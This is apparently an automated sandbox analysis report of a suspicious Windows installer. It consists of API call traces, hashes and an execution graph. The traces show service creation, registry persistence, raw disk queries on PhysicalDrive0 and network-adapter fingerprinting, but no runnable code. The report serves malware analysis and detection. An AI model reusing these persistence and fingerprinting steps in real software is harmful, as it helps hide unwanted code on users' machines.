                                                                                                                            • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                            • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                                            • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                            • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$EnumQuery
                                                                                                                            • String ID: Inno Setup: No Icons
                                                                                                                            • API String ID: 1576479698-2016326496
                                                                                                                            • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                            • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                                            • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                            • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                            • String ID: T$H
                                                                                                                            • API String ID: 1799206407-488339322
                                                                                                                            • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                                            • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                                                            • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                                            • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                            • String ID: T$H
                                                                                                                            • API String ID: 377330604-488339322
                                                                                                                            • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                            • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                                                            • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                            • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(74AE0000,00481A2F), ref: 0047D0E2
                                                                                                                              • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                                                              • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                                                            Strings
                                                                                                                            • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                                                            • API String ID: 1717587489-3199836293
                                                                                                                            • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                            • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                                                            • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                            • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1458359878-0
                                                                                                                            • Opcode ID: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
                                                                                                                            • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                                                            • Opcode Fuzzy Hash: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
                                                                                                                            • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:4%
                                                                                                                            Total number of Nodes:470
                                                                                                                            Total number of Limit Nodes:11
                                                                                                                            execution_graph 3666 4030c2 3667 4030c7 3666->3667 3670 40436c GetModuleHandleA 3667->3670 3669 4030cc 3671 40437b GetProcAddress 3670->3671 3672 40438b 3670->3672 3671->3672 3672->3669 3231 40d451 OpenSCManagerA 3595 404455 3596 404463 3595->3596 3597 40447e 3595->3597 3602 40610d 3596->3602 3605 40613a 3597->3605 3600 40446c 3601 404487 3608 406eb3 3602->3608 3604 406129 3604->3600 3606 406eb3 6 API calls 3605->3606 3607 406156 3606->3607 3607->3601 3610 406eee 3608->3610 3609 405c3b 6 API calls 3609->3610 3610->3609 3612 4071a3 3610->3612 3615 40719b 3610->3615 3611 405c3b 6 API calls 3611->3612 3612->3611 3614 4071ee 3612->3614 3613 405c3b 6 API calls 3613->3614 3614->3613 3614->3615 3615->3604 3706 402355 3707 4023b0 3706->3707 3708 402365 3706->3708 3708->3707 3709 402370 GetLastError SetServiceStatus SetEvent 3708->3709 3709->3707 3710 402157 3711 40215d 3710->3711 3712 402341 GetTickCount 3711->3712 3713 40d489 3712->3713 3731 406bd7 3732 406be6 3731->3732 3733 406c51 3732->3733 3734 406beb MultiByteToWideChar 3732->3734 3734->3733 3735 406c04 LCMapStringW 3734->3735 3735->3733 3736 406c1f 3735->3736 3737 406c25 3736->3737 3739 406c65 3736->3739 3737->3733 3738 406c33 LCMapStringW 3737->3738 3738->3733 3739->3733 3740 406c9d LCMapStringW 3739->3740 3740->3733 3741 406cb5 WideCharToMultiByte 3740->3741 3741->3733 3616 402658 3617 40dbee RegCreateKeyExA 3616->3617 3679 4022e0 VirtualAlloc 3680 40d8ac 3679->3680 3714 402562 3715 40d43e wsprintfA 3714->3715 3223 40d1e3 lstrcmpiW 3618 40d869 CommandLineToArgvW 3619 40da36 GetLocalTime 3618->3619 3620 401f27 27 API calls 3619->3620 3621 40da41 3620->3621 3621->3621 3681 4026e9 3682 40d248 StartServiceCtrlDispatcherA 3681->3682 3224 40226a RegQueryValueExA 3225 40d0ce 3224->3225 3622 40286e CreateThread 3623 40d73d 3622->3623 3624 40d46f CreateFileA 3625 40da4a CloseHandle ExitProcess 
3624->3625 3684 40d2f3 WaitForSingleObject ExitProcess 3685 4028f4 RegSetValueExA RegCloseKey 3686 40d63e SetEvent 3685->3686 3687 4026f5 3688 40d295 GetProcAddress 3687->3688 3626 402277 3627 40d2dd Sleep 3626->3627 3628 40d9fd 3627->3628 3628->3628 3629 406a77 3630 406a7e 3629->3630 3631 406a86 MultiByteToWideChar 3630->3631 3632 406aaf 3630->3632 3631->3632 3633 406a9f GetStringTypeW 3631->3633 3633->3632 3550 40da78 3551 40da41 3550->3551 3552 40da37 3550->3552 3552->3551 3554 401f27 3552->3554 3555 401f3c 3554->3555 3558 401a1d 3555->3558 3557 401f45 3557->3551 3559 401a2c 3558->3559 3564 401a4f CreateFileA 3559->3564 3563 401a3e 3563->3557 3565 401a35 3564->3565 3569 401a7d 3564->3569 3572 401b4b LoadLibraryA 3565->3572 3566 401a98 DeviceIoControl 3566->3569 3568 401b3a FindCloseChangeNotification 3568->3565 3569->3566 3569->3568 3570 401b0e GetLastError 3569->3570 3581 402e56 3569->3581 3584 402e48 3569->3584 3570->3568 3570->3569 3573 401c21 3572->3573 3574 401b6e GetProcAddress 3572->3574 3573->3563 3575 401c18 FreeLibrary 3574->3575 3578 401b85 3574->3578 3575->3573 3576 401b95 GetAdaptersInfo 3576->3578 3577 402e56 7 API calls 3577->3578 3578->3576 3578->3577 3579 401c15 3578->3579 3580 402e48 12 API calls 3578->3580 3579->3575 3580->3578 3582 403251 7 API calls 3581->3582 3583 402e5f 3582->3583 3583->3569 3585 403022 12 API calls 3584->3585 3586 402e53 3585->3586 3586->3569 3587 40d578 RegCloseKey 3689 4062f8 3690 403208 7 API calls 3689->3690 3691 4062ff 3690->3691 3588 402a7c 3589 40dc31 CreateDirectoryA 3588->3589 3743 4031fd 3744 403208 3743->3744 3750 40480e 3743->3750 3746 403216 3744->3746 3747 405264 7 API calls 3744->3747 3748 40529d 7 API calls 3746->3748 3747->3746 3749 40321f 3748->3749 3751 40481f 3 API calls 3750->3751 3752 40481b 3751->3752 3752->3744 3221 402981 RegOpenKeyExA 3222 4029be 3221->3222 3692 402281 3693 40d60e wsprintfA 3692->3693 3694 40d7e7 3693->3694 3753 402181 3754 402183 Sleep 3753->3754 3756 402a2b 3754->3756 3757 
405184 3760 40518c 3757->3760 3758 40521e 3760->3758 3761 405094 RtlUnwind 3760->3761 3762 4050ac 3761->3762 3762->3760 3695 40d086 3696 40d08e CloseServiceHandle 3695->3696 3698 406c8b 3699 406c99 3698->3699 3700 406c51 3699->3700 3701 406c9d LCMapStringW 3699->3701 3701->3700 3702 406cb5 WideCharToMultiByte 3701->3702 3702->3700 3763 40518c 3764 40521e 3763->3764 3766 4051aa 3763->3766 3765 405094 RtlUnwind 3765->3766 3766->3764 3766->3765 3227 40218d 3228 4026ef RegSetValueExA 3227->3228 3230 40dc54 RegCloseKey 3228->3230 3643 402211 3644 402216 3643->3644 3645 402898 GetModuleHandleA 3644->3645 3646 40d282 GetModuleFileNameA 3645->3646 3232 403112 GetVersion 3256 40344a HeapCreate 3232->3256 3234 403171 3235 403176 3234->3235 3236 40317e 3234->3236 3331 40322d 3235->3331 3268 404ee6 3236->3268 3240 403186 GetCommandLineA 3282 404db4 3240->3282 3244 4031a0 3314 404aae 3244->3314 3246 4031a5 3247 4031aa GetStartupInfoA 3246->3247 3327 404a56 3247->3327 3249 4031bc GetModuleHandleA 3251 4031e0 3249->3251 3337 4047fd 3251->3337 3255 4031fa 3257 4034a0 3256->3257 3258 40346a 3256->3258 3257->3234 3344 403302 3258->3344 3261 403486 3264 4034a3 3261->3264 3358 403cf8 3261->3358 3262 403479 3356 4034a7 HeapAlloc 3262->3356 3264->3234 3265 403483 3265->3264 3267 403494 HeapDestroy 3265->3267 3267->3257 3421 403010 3268->3421 3271 404f05 GetStartupInfoA 3279 405016 3271->3279 3281 404f51 3271->3281 3274 40507d SetHandleCount 3274->3240 3275 40503d GetStdHandle 3277 40504b GetFileType 3275->3277 3275->3279 3276 403010 12 API calls 3276->3281 3277->3279 3278 404fc2 3278->3279 3280 404fe4 GetFileType 3278->3280 3279->3274 3279->3275 3280->3278 3281->3276 3281->3278 3281->3279 3283 404e02 3282->3283 3284 404dcf GetEnvironmentStringsW 3282->3284 3286 404dd7 3283->3286 3287 404df3 3283->3287 3285 404de3 GetEnvironmentStrings 3284->3285 3284->3286 3285->3287 3288 403196 3285->3288 3289 404e1b WideCharToMultiByte 3286->3289 3290 404e0f GetEnvironmentStringsW 3286->3290 
3287->3288 3291 404ea1 3287->3291 3292 404e95 GetEnvironmentStrings 3287->3292 3305 404b67 3288->3305 3294 404e81 FreeEnvironmentStringsW 3289->3294 3295 404e4f 3289->3295 3290->3288 3290->3289 3296 403010 12 API calls 3291->3296 3292->3288 3292->3291 3294->3288 3297 403010 12 API calls 3295->3297 3303 404ebc 3296->3303 3298 404e55 3297->3298 3298->3294 3299 404e5e WideCharToMultiByte 3298->3299 3301 404e78 3299->3301 3302 404e6f 3299->3302 3300 404ed2 FreeEnvironmentStringsA 3300->3288 3301->3294 3487 403251 3302->3487 3303->3300 3306 404b79 3305->3306 3307 404b7e GetModuleFileNameA 3305->3307 3517 406707 3306->3517 3309 404ba1 3307->3309 3310 403010 12 API calls 3309->3310 3311 404bc2 3310->3311 3312 404bd2 3311->3312 3313 403208 7 API calls 3311->3313 3312->3244 3313->3312 3315 404abb 3314->3315 3317 404ac0 3314->3317 3316 406707 19 API calls 3315->3316 3316->3317 3318 403010 12 API calls 3317->3318 3319 404aed 3318->3319 3320 403208 7 API calls 3319->3320 3326 404b01 3319->3326 3320->3326 3321 404b44 3322 403251 7 API calls 3321->3322 3323 404b50 3322->3323 3323->3246 3324 403010 12 API calls 3324->3326 3325 403208 7 API calls 3325->3326 3326->3321 3326->3324 3326->3325 3328 404a5f 3327->3328 3330 404a64 3327->3330 3329 406707 19 API calls 3328->3329 3329->3330 3330->3249 3332 403236 3331->3332 3333 40323b 3331->3333 3335 405264 7 API calls 3332->3335 3334 40529d 7 API calls 3333->3334 3336 403244 ExitProcess 3334->3336 3335->3333 3541 40481f 3337->3541 3340 4048d2 3341 4048de 3340->3341 3342 404a07 UnhandledExceptionFilter 3341->3342 3343 4048f2 3341->3343 3342->3343 3343->3255 3343->3343 3367 402ef0 3344->3367 3347 403345 GetEnvironmentVariableA 3349 403422 3347->3349 3352 403364 3347->3352 3348 40332b 3348->3347 3350 40333d 3348->3350 3349->3350 3372 4032d5 GetModuleHandleA 3349->3372 3350->3261 3350->3262 3353 4033a9 GetModuleFileNameA 3352->3353 3354 4033a1 3352->3354 3353->3354 3354->3349 3369 4053f0 3354->3369 3357 4034c3 3356->3357 3357->3265 3359 
403d05 3358->3359 3360 403d0c HeapAlloc 3358->3360 3361 403d29 VirtualAlloc 3359->3361 3360->3361 3366 403d61 3360->3366 3362 403d49 VirtualAlloc 3361->3362 3363 403e1e 3361->3363 3364 403e10 VirtualFree 3362->3364 3362->3366 3365 403e26 HeapFree 3363->3365 3363->3366 3364->3363 3365->3366 3366->3265 3368 402efc GetVersionExA 3367->3368 3368->3347 3368->3348 3374 405407 3369->3374 3373 4032ec 3372->3373 3373->3350 3376 40541f 3374->3376 3379 40544f 3376->3379 3381 405c3b 3376->3381 3377 405403 3377->3349 3378 405c3b 6 API calls 3378->3379 3379->3377 3379->3378 3385 4068ae 3379->3385 3382 405c4d 3381->3382 3383 405c59 3381->3383 3382->3376 3391 40697a 3383->3391 3386 4068d9 3385->3386 3390 4068bc 3385->3390 3387 4068f5 3386->3387 3388 405c3b 6 API calls 3386->3388 3387->3390 3403 406ac3 3387->3403 3388->3387 3390->3379 3392 4069ab GetStringTypeW 3391->3392 3394 4069c3 3391->3394 3393 4069c7 GetStringTypeA 3392->3393 3392->3394 3393->3394 3397 406aaf 3393->3397 3395 4069ee GetStringTypeA 3394->3395 3398 406a12 3394->3398 3395->3397 3397->3382 3398->3397 3399 406a28 MultiByteToWideChar 3398->3399 3399->3397 3400 406a4c 3399->3400 3400->3397 3401 406a86 MultiByteToWideChar 3400->3401 3401->3397 3402 406a9f GetStringTypeW 3401->3402 3402->3397 3404 406af3 LCMapStringW 3403->3404 3405 406b0f 3403->3405 3404->3405 3406 406b17 LCMapStringA 3404->3406 3408 406b75 3405->3408 3409 406b58 LCMapStringA 3405->3409 3406->3405 3407 406c51 3406->3407 3407->3390 3408->3407 3410 406b8b MultiByteToWideChar 3408->3410 3409->3407 3410->3407 3411 406bb5 3410->3411 3411->3407 3412 406beb MultiByteToWideChar 3411->3412 3412->3407 3413 406c04 LCMapStringW 3412->3413 3413->3407 3414 406c1f 3413->3414 3415 406c25 3414->3415 3417 406c65 3414->3417 3415->3407 3416 406c33 LCMapStringW 3415->3416 3416->3407 3417->3407 3418 406c9d LCMapStringW 3417->3418 3418->3407 3419 406cb5 WideCharToMultiByte 3418->3419 3419->3407 3430 403022 3421->3430 3424 403208 3425 403211 3424->3425 3426 403216 3424->3426 
3467 405264 3425->3467 3473 40529d 3426->3473 3431 40301f 3430->3431 3433 403029 3430->3433 3431->3271 3431->3424 3433->3431 3434 40304e 3433->3434 3435 403072 3434->3435 3436 40305d 3434->3436 3438 4030b1 HeapAlloc 3435->3438 3442 40306b 3435->3442 3449 403ff0 3435->3449 3436->3442 3443 403843 3436->3443 3439 4030c0 3438->3439 3439->3433 3440 403070 3440->3433 3442->3438 3442->3439 3442->3440 3446 403875 3443->3446 3444 403914 3448 403923 3444->3448 3463 403bfd 3444->3463 3446->3444 3446->3448 3456 403b4c 3446->3456 3448->3442 3450 403ffe 3449->3450 3451 4040ea VirtualAlloc 3450->3451 3452 4041bf 3450->3452 3455 4040bb 3450->3455 3451->3455 3453 403cf8 5 API calls 3452->3453 3453->3455 3455->3442 3457 403b8f HeapAlloc 3456->3457 3458 403b5f HeapReAlloc 3456->3458 3460 403bb5 VirtualAlloc 3457->3460 3461 403bdf 3457->3461 3459 403b7e 3458->3459 3458->3461 3459->3457 3460->3461 3462 403bcf HeapFree 3460->3462 3461->3444 3462->3461 3464 403c0f VirtualAlloc 3463->3464 3466 403c58 3464->3466 3466->3448 3468 40526e 3467->3468 3469 40529b 3468->3469 3470 40529d 7 API calls 3468->3470 3469->3426 3471 405285 3470->3471 3472 40529d 7 API calls 3471->3472 3472->3469 3476 4052b0 3473->3476 3474 40321f 3474->3271 3475 4053c7 3478 4053da GetStdHandle WriteFile 3475->3478 3476->3474 3476->3475 3477 4052f0 3476->3477 3477->3474 3479 4052fc GetModuleFileNameA 3477->3479 3478->3474 3480 405314 3479->3480 3482 406723 3480->3482 3483 406730 LoadLibraryA 3482->3483 3485 406772 3482->3485 3484 406741 GetProcAddress 3483->3484 3483->3485 3484->3485 3486 406758 GetProcAddress GetProcAddress 3484->3486 3485->3474 3486->3485 3488 403279 3487->3488 3489 40325d 3487->3489 3488->3301 3490 403267 3489->3490 3491 40327d 3489->3491 3493 4032a9 HeapFree 3490->3493 3494 403273 3490->3494 3492 4032a8 3491->3492 3496 403297 3491->3496 3492->3493 3493->3488 3498 40351a 3494->3498 3504 403fab 3496->3504 3499 403558 3498->3499 3503 40380e 3498->3503 3500 403754 VirtualFree 3499->3500 3499->3503 3501 
4037b8 3500->3501 3502 4037c7 VirtualFree HeapFree 3501->3502 3501->3503 3502->3503 3503->3488 3505 403fd8 3504->3505 3506 403fee 3504->3506 3505->3506 3508 403e92 3505->3508 3506->3488 3511 403e9f 3508->3511 3509 403f4f 3509->3506 3510 403ec0 VirtualFree 3510->3511 3511->3509 3511->3510 3513 403e3c VirtualFree 3511->3513 3514 403e59 3513->3514 3515 403e89 3514->3515 3516 403e69 HeapFree 3514->3516 3515->3511 3516->3511 3518 406710 3517->3518 3519 406717 3517->3519 3521 406343 3518->3521 3519->3307 3528 4064dc 3521->3528 3524 406386 GetCPInfo 3526 40639a 3524->3526 3527 4064d0 3526->3527 3533 406582 GetCPInfo 3526->3533 3527->3519 3529 4064fc 3528->3529 3530 4064ec GetOEMCP 3528->3530 3531 406354 3529->3531 3532 406501 GetACP 3529->3532 3530->3529 3531->3524 3531->3526 3531->3527 3532->3531 3534 40666d 3533->3534 3537 4065a5 3533->3537 3534->3527 3535 40697a 6 API calls 3536 406621 3535->3536 3538 406ac3 9 API calls 3536->3538 3537->3535 3539 406645 3538->3539 3540 406ac3 9 API calls 3539->3540 3540->3534 3542 40482b GetCurrentProcess TerminateProcess 3541->3542 3545 40483c 3541->3545 3542->3545 3543 4031e9 3543->3340 3544 4048a6 ExitProcess 3545->3543 3545->3544 3549 402994 CopyFileA 3647 40d415 GetModuleHandleA 3767 404395 3772 405cb0 3767->3772 3769 4043a3 3770 4043d5 3769->3770 3771 405c3b 6 API calls 3769->3771 3771->3769 3773 405cdd 3772->3773 3777 405cc0 3772->3777 3774 405cfb 3773->3774 3775 405c3b 6 API calls 3773->3775 3776 406ac3 9 API calls 3774->3776 3774->3777 3775->3774 3776->3777 3777->3769 3648 402a1b 3649 40d9e5 GetModuleHandleA 3648->3649 3650 40d945 GetModuleFileNameW 3649->3650 3651 40db26 3650->3651 3778 40219d 3779 4021a2 3778->3779 3780 402a02 3779->3780 3781 40d6ea GetLastError 3779->3781 3782 40d953 LoadLibraryExA 3781->3782 3783 40d96a 3782->3783 3783->3783 3590 40481f 3591 40482b GetCurrentProcess TerminateProcess 3590->3591 3594 40483c 3590->3594 3591->3594 3592 4048b6 3593 4048a6 ExitProcess 3594->3592 3594->3593 3722 402721 3723 
403010 12 API calls 3722->3723 3724 402726 3723->3724 3704 4028a4 3705 40d2c8 CreateServiceA 3704->3705 3226 40d62b RegCreateKeyExA 3784 4025ad 3785 4025b2 3784->3785 3786 40d253 GetTickCount 3785->3786 3652 402a32 3653 402a37 3652->3653 3654 40db2e GetCommandLineW 3653->3654 3787 4023b3 RegisterServiceCtrlHandlerA 3788 4023d6 3787->3788 3789 4024cc 3787->3789 3790 4023e4 SetServiceStatus GetLastError CreateEventA 3788->3790 3791 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 3790->3791 3792 40243e GetLastError 3790->3792 3793 4024c3 SetServiceStatus 3791->3793 3792->3793 3793->3789 3794 40d1b6 3795 4021a2 3794->3795 3797 402a02 3794->3797 3796 40d6ea GetLastError 3795->3796 3795->3797 3798 40d953 LoadLibraryExA 3796->3798 3799 40d96a 3798->3799 3799->3799 3800 4025ba 3801 40d268 GetModuleFileNameA 3800->3801 3655 40283e 3658 401f64 FindResourceA 3655->3658 3657 402843 3659 401f86 GetLastError SizeofResource 3658->3659 3665 401f9f 3658->3665 3660 401fa6 LoadResource LockResource GlobalAlloc 3659->3660 3659->3665 3661 401fd2 3660->3661 3662 401ffb GetTickCount 3661->3662 3663 402005 GlobalAlloc 3662->3663 3663->3665 3665->3657

                                                                                                                            Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
• GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
• FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Library$AdaptersAddressFreeInfoLoadProc
• String ID: GetAdaptersInfo$iphlpapi.dll$o
• API String ID: 514930453-3667123677
• Opcode ID: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
• Instruction ID: 696171d77ced3da8e64ebdc8d7a45064a9ae827dbc58ea61f09f05304c00b930
• Opcode Fuzzy Hash: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
• Instruction Fuzzy Hash: 6421D870940209AEDF219FA5CD447EF7BB8EF41304F0440BAD604B22E1E7789985CB69
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
• DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
• GetLastError.KERNEL32 ref: 00401B0E
• FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
